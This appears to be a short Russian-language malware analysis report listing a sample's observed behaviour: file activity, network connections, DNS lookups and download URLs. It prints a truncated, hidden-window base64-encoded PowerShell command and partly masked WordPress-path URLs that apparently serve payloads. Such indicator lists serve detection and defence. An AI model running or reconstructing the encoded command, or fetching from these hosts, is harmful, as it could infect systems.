Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1375850.cvr
- 'se###ntel.com':80
- 'se###ntel.com':443
- 'sn###cords.com':80
- 'sn###cords.com':443
- 'si#####esponsive.com':80
- 'de###ndunn.com':443
- 'sh####kevault.com':80
- http://se###ntel.com/newsletter/P_ai/
- http://sn###cords.com/wp-includes/7C_S/
- http://si#####esponsive.com/wp-admin/Jn_R/
- http://sh####kevault.com/wp-includes/d_r/
- 'se###ntel.com':443
- 'sn###cords.com':443
- 'de###ndunn.com':443
- DNS ASK se###ntel.com
- DNS ASK sn###cords.com
- DNS ASK sc###laert.eu
- DNS ASK si#####esponsive.com
- DNS ASK de###ndunn.com
- DNS ASK sh####kevault.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...' (со скрытым окном)